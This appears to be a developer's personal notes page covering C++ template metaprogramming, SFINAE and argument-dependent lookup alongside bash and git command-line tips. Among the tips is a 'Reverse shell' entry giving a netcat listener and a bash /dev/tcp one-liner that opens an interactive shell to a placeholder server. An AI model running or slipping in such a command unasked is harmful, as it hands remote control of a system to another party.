Template metaprogramming (TMP) is a programming technique in which the code is written as a template in a special language. It uses templates, which are a form of meta-programming, to generate program code and data structures at compile-time instead of runtime. This allows the programmer to perform computations during compilation, resulting in improved performance and reduced code size. TMP is often used to create highly optimized code and data structures, as the code is generated at compile-time and can be tailored specifically to the target platform. TMP can also be used to create domain-specific languages that can be used to simplify complex computations.

Templates are a powerful feature of the C++ Standard Library that allow developers to write code that is generic and can be used with any type of data. They allow for code to be written once and used with different types of data, and also allow for better code reuse. Templates allow developers to define a type-independent interface and implementation, and then let the compiler substitute the appropriate type when the code is compiled. This makes code more efficient as it eliminates the need to write multiple versions of the same code for different types of data. Templates also make it easier for developers to create generic algorithms that can be used with multiple types of data.

SFINAE

SFINAE (Substitution Failure Is Not An Error) is a technique used in template metaprogramming to detect error conditions at compile-time. It allows a compiler to substitute a template argument with a type that cannot be instantiated, and if the substitution fails, the compiler will not generate an error, but instead simply ignore the template specialization. This allows for complex template conditions to be implemented in a way that is easily readable and maintainable.


bash

As a Linux developer you need a strong command line game. bash is ubiquitous, and a powerful language in itself, without resorting to something like Python.

git

git is awesome on the command line and pretty much essential. Use it to manage your chores. See how to undo almost anything with git.

Send a string to an IP/port

(echo hello; sleep 1) | telnet 127.0.0.1 80
echo hello > /dev/tcp/127.0.0.1/80
echo hello | nc localhost 80

Reverse shell

# server
nc -knvlp 3389

# client
bash -i >& /dev/tcp/server_ip/3389 0>&1

Target everything but one file

git add !(unit.md)
shuf -n 1 readme.txt

From bash 5.

echo $EPOCHREALTIME
1614870873.574544

echo $EPOCHSECONDS
1614870876

uptime

The three load average values are 1, 5 and 15 minutes.

uptime
15:29:28 up 20:23, 0 users, load average: 5.08, 1.49, 0.51

stress

Stress your system in different ways.

stress --cpu 8
echo $(nproc)

Synonyms for localhost

localhost
127.0.0.1
127.0.0.2
127.0.0.3
127.1
0.0.0.0
0 # wut

Move a file out of the way

mv {,_}.bash_history

Repeat a command

watch -d ip a

pushd equivalent

I use this all the time. Rather than pushd and popd to navigate around the file system:

# Navigate to new dir
cd ~/deanturpin.gitlab.io/content/post

# Return whence you came
cd -

Argument dependent lookup (aka Koenig lookup)

Argument-dependent lookup, also known as ADL, or Koenig lookup, is the set of rules for looking up the unqualified function names in function-call expressions, including implicit function calls to overloaded operators. These function names are looked up in the namespaces of their arguments in addition to the scopes and namespaces considered by the usual unqualified name lookup.

Notice begin and end parameters don’t specify a namespace, see ADL.

#include <iostream>
#include <vector>
#include <iterator>

int main() {

    const std::vector v{1, 2, 3, 4, 5};
    std::copy(cbegin(v), cend(v), std::ostream_iterator<int>(std::cout, "n"));
}